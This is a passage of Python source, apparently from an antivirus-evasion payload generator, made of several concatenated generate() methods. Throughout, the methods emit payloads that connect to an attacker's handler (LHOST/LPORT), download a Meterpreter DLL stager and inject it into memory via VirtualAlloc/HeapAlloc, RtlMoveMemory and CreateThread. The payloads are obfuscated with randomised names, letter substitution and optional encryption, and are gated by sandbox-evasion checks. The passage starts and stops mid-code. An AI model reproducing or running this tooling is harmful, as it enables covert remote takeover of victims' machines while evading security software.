payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
# download the metpreter .dll and inject it
payload_code += "%s = ''\n" % (data2Name)
payload_code += "%s = %s(\"%s\", %s)\n" % (
data2Name, downloadMethodName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
payload_code += "%s(%s)\n" % (injectMethodName, data2Name)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n"
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
rand_hostname = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import platform\n'
payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
payload_code += '\t' * num_tabs_required + 'if \"' + self.required_options["HOSTNAME"][0].lower() + '\" in ' + rand_hostname + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
rand_domain = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import socket\n'
payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
payload_code += '\t' * num_tabs_required + 'if \"' + self.required_options["DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
rand_processor_count = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options["PROCESSORS"][0] + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import getpass\n'
payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options["USERNAME"][0].lower() + '\' in ' + rand_user_name + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
# socket and shellcode variables that need to be kept global
payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % (shellCodeName,socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += '\t' * num_tabs_required + "def %s():\n" %(getDataMethodName)
payload_code += '\t' * num_tabs_required + "\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" %(socketName)
# build the socket and connect to the handler
payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" %(socketName)
payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" %(socketName,self.required_options["LHOST"][0],self.required_options["LPORT"][0])
# pack the underlying socket file descriptor into a c structure
payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName,socketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" %(socketName)
payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % (rcvStringName)
# receive ALL of the payload .dll data
payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName)
payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % (rcvStringName,rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" %(rcvCStringName)
# copy the socket fd in
payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % (rcvCStringName)
payload_code += '\t' * num_tabs_required + "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += '\t' * num_tabs_required + "def %s(%s):\n" %(injectMethodName,tempShellcodeName)
payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" %(tempShellcodeName)
payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" %(shellcodeBufName,tempShellcodeName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n"
# copy the .dll into the allocated memory
payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n"
# kick the thread off to execute the .dll
payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
# wait for the .dll execution to finish
payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n"
# Assume HEAP Injection
else:
HeapVar = evasion_helpers.randomString()
handleName = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
# download the stager
payload_code += "%s = %s()\n" %(shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Random letter substition variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code = ''
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this,
decode_with_this).replace('\\', '\\\\')
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
rand_hostname = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import platform\n'
payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[
"HOSTNAME"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
rand_domain = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import socket\n'
payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[
"DOMAIN"][0] + '\":\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
rand_processor_count = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
"PROCESSORS"][0] + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import getpass\n'
payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
"USERNAME"][
0] + '\'.lower() in ' + rand_user_name + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace(
'\\\\', '\\') + '\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# randomize all of the variable names used
shellCodeName = evasion_helpers.randomString()
socketName = evasion_helpers.randomString()
getDataMethodName = evasion_helpers.randomString()
fdBufName = evasion_helpers.randomString()
rcvStringName = evasion_helpers.randomString()
rcvCStringName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
tempShellcodeName = evasion_helpers.randomString()
shellcodeBufName = evasion_helpers.randomString()
fpName = evasion_helpers.randomString()
tempCBuffer = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n"
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# socket and shellcode variables that need to be kept global
payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % (
shellCodeName, socketName)
# build the method that creates a socket, connects to the handler,
# and downloads/patches the meterpreter .dll
payload_code += '\t' * num_tabs_required + "def %s():\n" % (
getDataMethodName)
payload_code += '\t' * num_tabs_required + "\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" % (
socketName)
# build the socket and connect to the handler
payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % (
socketName)
payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" % (
socketName, self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
# pack the underlying socket file descriptor into a c structure
payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % (
fdBufName, socketName)
# unpack the length of the payload, received as a 4 byte array from the handler
payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % (
socketName)
payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % (
rcvStringName)
# receive ALL of the payload .dll data
payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (
rcvStringName, rcvStringName, socketName)
payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % (
rcvStringName, rcvStringName)
# prepend a little assembly magic to push the socket fd into the edi register
payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" % (
rcvCStringName)
# copy the socket fd in
payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % (
rcvCStringName, fdBufName)
payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % (
rcvCStringName)
payload_code += '\t' * num_tabs_required + "\texcept: return None\n"
# build the method that injects the .dll into memory
payload_code += '\t' * num_tabs_required + "def %s(%s):\n" % (
injectMethodName, tempShellcodeName)
payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" % (
tempShellcodeName)
payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" % (
shellcodeBufName, tempShellcodeName)
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# allocate enough virtual memory to stuff the .dll in
payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
# virtual lock to prevent the memory from paging out to disk
payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n"
# copy the .dll into the allocated memory
payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n"
# kick the thread off to execute the .dll
payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
# wait for the .dll execution to finish
payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n"
# Assume HEAP Injection
else:
HeapVar = evasion_helpers.randomString()
handleName = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
# download the stager
payload_code += '\t' * num_tabs_required + "%s = %s()\n" % (
shellCodeName, getDataMethodName)
# inject what we grabbed
payload_code += '\t' * num_tabs_required + "%s(%s)\n" % (
injectMethodName, shellCodeName)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Random letter substition variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this,
decode_with_this).replace('\\', '\\\\')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace(
'\\\\', '\\') + '\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code = ''
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
RandPtr = evasion_helpers.randomString()
RandHt = evasion_helpers.randomString()
RandEncShellCodePayload = evasion_helpers.randomString()
known_plaintext_string = evasion_helpers.randomString()
plaintext_string_variable = evasion_helpers.randomString()
key_guess = evasion_helpers.randomString()
secret_key = evasion_helpers.randomString()
small_constrained_key_variable = evasion_helpers.randomString()
decoded_ciphertext = evasion_helpers.randomString()
decoded_known = evasion_helpers.randomString()
decoded_shellcode = evasion_helpers.randomString()
RandCipherObject = evasion_helpers.randomString()
RandPadding = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
RandToday = evasion_helpers.randomString()
RandExpire = evasion_helpers.randomString()
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Create Payload code
payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
